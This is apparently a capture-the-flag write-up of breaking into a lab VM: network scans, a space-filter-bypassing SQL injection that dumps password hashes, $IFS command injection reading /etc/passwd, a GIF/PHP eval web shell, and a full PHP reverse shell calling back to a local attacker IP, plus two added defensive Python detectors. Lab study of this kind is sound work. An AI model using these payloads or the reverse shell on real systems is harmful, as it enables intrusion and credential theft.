```
┌──(root㉿kali)-[~]
└─# arp-scan -l
Interface: eth0, type: EN10MB, MAC: 00:0c:29:10:3c:9b, IPv4: 192.168.163.28
Starting arp-scan 1.9.8 with 256 hosts (https://github.com/royhills/arp-scan)
192.168.163.152 d2:a6:97:bb:46:9d (Unknown: locally administered)
192.168.163.193 00:0c:29:01:34:57 VMware, Inc.
192.168.163.209 7c:b5:66:a5:f0:a5 Intel Corporate

3 packets received by filter, 0 packets dropped by kernel
Ending arp-scan 1.9.8: 256 hosts scanned in 1.946 seconds (131.55 hosts/sec). 3 responded
```

```
┌──(root㉿kali)-[~]
└─# nmap -Pn 192.168.163.193
Starting Nmap 7.93 ( https://nmap.org ) at 2024-02-26 00:43 EST
Nmap scan report for 192.168.163.193
Host is up (0.00056s latency).
Not shown: 998 closed tcp ports (reset)
PORT   STATE SERVICE
22/tcp open  ssh
80/tcp open  http
MAC Address: 00:0C:29:01:34:57 (VMware)

Nmap done: 1 IP address (1 host up) scanned in 0.33 seconds
```
```
┌──(root㉿kali)-[~]
└─# nmap -sV -sC -p- 192.168.163.193
Starting Nmap 7.93 ( https://nmap.org ) at 2024-02-26 00:43 EST
Nmap scan report for 192.168.163.193
Host is up (0.0012s latency).
Not shown: 65533 closed tcp ports (reset)
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 7.7p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
|   2048 6ba824d6092fc99a8eabbc6e7d4eb9ad (RSA)
|   256 abe84f5338062c6af392e3974a0e3ed1 (ECDSA)
|_  256 327690b87dfca4326310cd676149d6c4 (ED25519)
80/tcp open  http    Apache httpd 2.4.34 ((Ubuntu))
|_http-title: Site doesn't have a title (text/html; charset=UTF-8).
|_http-server-header: Apache/2.4.34 (Ubuntu)
MAC Address: 00:0C:29:01:34:57 (VMware)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 10.60 seconds
```
```
┌──(root㉿kali)-[~]
└─# dirsearch -u "http://192.168.163.193" -x 403,404,500

  _|. _ _  _  _  _ _|_    v0.4.3
 (_||| _) (/_(_|| (_| )

Extensions: php, aspx, jsp, html, js | HTTP method: GET | Threads: 25
Wordlist size: 11460

Output File: /root/reports/http_192.168.163.193/_24-02-26_00-44-22.txt

Target: http://192.168.163.193/

[00:44:22] Starting:
[00:44:41] 200 -    0B  - /config.php
[00:44:51] 200 -  527B  - /login.php
[00:44:52] 302 -    0B  - /logout.php  ->  login.php
[00:45:01] 200 -  594B  - /register.php
[00:45:09] 301 -  320B  - /uploads  ->  http://192.168.163.193/uploads/

Task Completed
```
```
┌──(root㉿kali)-[~]
└─# gobuster dir -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -u "http://192.168.163.193"
===============================================================
Gobuster v3.6
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:                     http://192.168.163.193
[+] Method:                  GET
[+] Threads:                 10
[+] Wordlist:                /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
[+] Negative Status codes:   404
[+] User Agent:              gobuster/3.6
[+] Timeout:                 10s
===============================================================
Starting gobuster in directory enumeration mode
===============================================================
/uploads              (Status: 301) [Size: 320] [--> http://192.168.163.193/uploads/]
/server-status        (Status: 403) [Size: 303]
Progress: 220560 / 220561 (100.00%)
===============================================================
Finished
```
Visiting http://192.168.163.193/login.php shows a login page; weak passwords do not get in.

From the directory scan, http://192.168.163.193//register.php is a registration page, so register an account and try logging in with it.

After logging in it is a search page, so I guessed SQL injection; submitting it with no input at all shows the table.

I did the SQL injection by capturing the request; personally I find that more convenient.

Adding a ' after OSINT makes the page display nothing at all, which indicates SQL injection.

While looking for the display columns, I guessed that spaces are filtered.

Space filter bypass: `/**/` in place of each space.

```
search=-OSINT'/**/union/**/select/**/1,2,3#
search=-OSINT'/**/union/**/select/**/1,2,database()#
search=OSINT'/**/union/**/select/**/group_concat(table_name),2,3/**/from/**/information_schema.tables/**/where/**/table_schema='webapphacking'#
OSINT'/**/union/**/select/**/group_concat(column_name),2,3/**/from/**/information_schema.columns/**/where/**/table_name='users'#
search=OSINT'/**/union/**/select/**/group_concat(user,":",pasword),2,3/**/from/**/users#
```
```
user1:5d41402abc4b2a76b9719d911017c592,
user2:6269c4f71a55b24bad0f0267d9be5508,
user3:0f359740bd1cda994f8b55330c86d845,
test:05a671c66aefea124cc08b76ea6d30bb,
superadmin:2386acb2cf356944177746fc92523983,
test1:05a671c66aefea124cc08b76ea6d30bb,
admin:e64b78fc3bc91bcbc7dc232ba8ec59e0,
asd:e64b78fc3bc91bcbc7dc232ba8ec59e0
```

Credentials recovered from the dump: superadmin / Uncrackable
Whitelist

In the last name field there is a command execution point.

Spaces are filtered here too, bypassed with $IFS:

```
system('cat${IFS}/etc/passwd')
system('cat$IFS$1/etc/passwd')
```
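Both filters on this box (the search parameter and the last-name field) only strip literal spaces, and `/**/` or `${IFS}` stand in for the space the database or shell will see. As an added example that is not part of the write-up, the Python below canonicalises those substitutes before matching, which is what a WAF rule or log detector needs to do to catch the payloads above; the sample request strings are constructed, `search` is the parameter name from the page, and `lastname` and the function names are my assumptions.

```python
import re
from typing import Optional
from urllib.parse import unquote_plus

# Constructed sample request bodies, as a WAF or access-log pipeline would
# see them. The first four mirror the payloads in this write-up; the last
# two are benign (a real name with an apostrophe must not be flagged).
SAMPLE_REQUESTS = [
    "search=-OSINT'/**/union/**/select/**/1,2,database()#",
    "search=OSINT'/**/union/**/select/**/group_concat(user,\":\",pasword),2,3/**/from/**/users#",
    "lastname=system('cat${IFS}/etc/passwd')",
    "lastname=system('cat$IFS$1/etc/passwd')",
    "search=OSINT",
    "lastname=O'Brien",
]

def normalize(raw: str) -> str:
    """Decode and collapse the space substitutes used to evade a space filter."""
    s = unquote_plus(raw)                            # %2F%2A%2A%2F -> /**/
    s = re.sub(r"/\*.*?\*/", " ", s)                 # /**/ or /*x*/ -> space
    s = re.sub(r"\$\{IFS\}|\$IFS(\$\d)?", " ", s)    # ${IFS}, $IFS, $IFS$1 -> space
    s = re.sub(r"\s+", " ", s)                       # collapse runs of whitespace
    return s.lower()

# Matched against the normalised string, so comment/IFS padding no longer hides them.
SQLI_UNION = re.compile(r"'\s*union\s+(all\s+)?select\b")
CMD_INJECT = re.compile(r"\b(system|exec|passthru|shell_exec)\s*\(")

def classify(raw: str) -> Optional[str]:
    """Return 'sqli', 'cmdi' or None for one parameter string."""
    s = normalize(raw)
    if SQLI_UNION.search(s):
        return "sqli"
    if CMD_INJECT.search(s):
        return "cmdi"
    return None

def scan(requests):
    """Classify a batch; returns (raw, verdict) pairs for alerting or review."""
    return [(r, classify(r)) for r in requests]

if __name__ == "__main__":
    for raw, verdict in scan(SAMPLE_REQUESTS):
        print(f"{verdict or 'clean':5}  {raw}")
```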
Look at the uploads directory. Because uploads only accepts image-format files, we upload a malicious image and then change its extension through the command execution.

```
system('ls${IFS}-al${IFS}/var/www/html/uploads')
```

year2020 is the upload directory.

```
system('ls${IFS}-al${IFS}/var/www/html/uploads/year2020')
```

Upload the malicious image:

```
GIF89a
<?php @eval($_POST['c']);?>
```

Change the extension:

```
system('mv${IFS}/var/www/html/uploads/year2020/1.jpg${IFS}/var/www/html/uploads/year2020/1.php')
```
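The upload step above gets past an image-only check with a GIF header in front of PHP, and the extension is fixed afterwards. As an added example that is not part of the write-up, the Python below shows the server-side checks a defender would put on that upload form: an extension allowlist, magic bytes that must agree with the extension, a scan for PHP open tags, and a server-chosen stored name; the sample files are constructed and the function names are mine.

```python
import os
import re
import secrets

# Constructed sample uploads: the polyglot from this write-up (GIF header
# followed by a PHP stub), a minimal 1x1 GIF header, and a bare PHP file.
POLYGLOT_JPG = ("1.jpg", b"GIF89a\n<?php @eval($_POST['c']);?>")
REAL_GIF = ("cat.gif", b"GIF89a\x01\x00\x01\x00\x80\x00\x00" + b"\x00" * 6 + b";")
PLAIN_PHP = ("shell.php", b"<?php system($_GET['cmd']); ?>")

# Extension allowlist, each tied to the magic bytes that extension must start with.
ALLOWED = {
    ".jpg": b"\xff\xd8\xff",
    ".jpeg": b"\xff\xd8\xff",
    ".png": b"\x89PNG\r\n\x1a\n",
    ".gif": b"GIF8",
}
# PHP open tags anywhere in the body mark a polyglot, whatever the header says.
PHP_TAG = re.compile(rb"<\?(php|=|\s)", re.IGNORECASE)

def check_upload(filename: str, data: bytes) -> str:
    """Return 'ok' or the reason the upload is rejected."""
    ext = os.path.splitext(filename)[1].lower()
    if ext not in ALLOWED:
        return "extension not allowed"
    # A .jpg that starts with GIF89a is already wrong: this is where the
    # page's 1.jpg fails even before the PHP tag is looked at.
    if not data.startswith(ALLOWED[ext]):
        return "magic bytes do not match extension"
    if PHP_TAG.search(data):
        return "embedded php tag"
    return "ok"

def stored_name(filename: str) -> str:
    """Server-chosen name: random stem plus the allowlisted extension only."""
    ext = os.path.splitext(filename)[1].lower()
    return secrets.token_hex(16) + ext
```

On this box the extension was changed afterwards through the command-injection point, so the upload check alone would not have broken the chain; it has to be paired with a web-server rule that never executes scripts from the uploads tree.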
After it executes successfully, check the result.

Visit:

```
http://192.168.163.193/uploads/year2020/1.php
```
```php
<?php
// php-reverse-shell - A Reverse Shell implementation in PHP. Comments stripped to slim it down. RE: https://raw.githubusercontent.com/pentestmonkey/php-reverse-shell/master/php-reverse-shell.php
// Copyright (C) 2007 pentestmonkey@pentestmonkey.net

set_time_limit (0);
$VERSION = "1.0";
$ip = '192.168.163.209';
$port = 6666;
$chunk_size = 1400;
$write_a = null;
$error_a = null;
$shell = 'uname -a; w; id; /bin/bash -i';
$daemon = 0;
$debug = 0;

if (function_exists('pcntl_fork')) {
    $pid = pcntl_fork();
    if ($pid == -1) {
        printit("ERROR: Can't fork");
        exit(1);
    }
    if ($pid) {
        exit(0); // Parent exits
    }
    if (posix_setsid() == -1) {
        printit("Error: Can't setsid()");
        exit(1);
    }
    $daemon = 1;
} else {
    printit("WARNING: Failed to daemonise. This is quite common and not fatal.");
}

chdir("/");
umask(0);

// Open reverse connection
$sock = fsockopen($ip, $port, $errno, $errstr, 30);
if (!$sock) {
    printit("$errstr ($errno)");
    exit(1);
}

$descriptorspec = array(
    0 => array("pipe", "r"), // stdin is a pipe that the child will read from
    1 => array("pipe", "w"), // stdout is a pipe that the child will write to
    2 => array("pipe", "w")  // stderr is a pipe that the child will write to
);

$process = proc_open($shell, $descriptorspec, $pipes);

if (!is_resource($process)) {
    printit("ERROR: Can't spawn shell");
    exit(1);
}

stream_set_blocking($pipes[0], 0);
stream_set_blocking($pipes[1], 0);
stream_set_blocking($pipes[2], 0);
stream_set_blocking($sock, 0);

printit("Successfully opened reverse shell to $ip:$port");

while (1) {
    if (feof($sock)) {
        printit("ERROR: Shell connection terminated");
        break;
    }
    if (feof($pipes[1])) {
        printit("ERROR: Shell process terminated");
        break;
    }
    $read_a = array($sock, $pipes[1], $pipes[2]);
    $num_changed_sockets = stream_select($read_a, $write_a, $error_a, null);

    if (in_array($sock, $read_a)) {
        if ($debug) printit("SOCK READ");
        $input = fread($sock, $chunk_size);
        if ($debug) printit("SOCK: $input");
        fwrite($pipes[0], $input);
    }
    if (in_array($pipes[1], $read_a)) {
        if ($debug) printit("STDOUT READ");
        $input = fread($pipes[1], $chunk_size);
        if ($debug) printit("STDOUT: $input");
        fwrite($sock, $input);
    }
    if (in_array($pipes[2], $read_a)) {
        if ($debug) printit("STDERR READ");
        $input = fread($pipes[2], $chunk_size);
        if ($debug) printit("STDERR: $input");
        fwrite($sock, $input);
    }
}

fclose($sock);
fclose($pipes[0]);
fclose($pipes[1]);
fclose($pipes[2]);
proc_close($process);

function printit ($string) {
    if (!$daemon) {
        print "$string\n";
    }
}
?>
```
Er, this privilege escalation...

There is an executable in the legacy directory; running it directly gives root.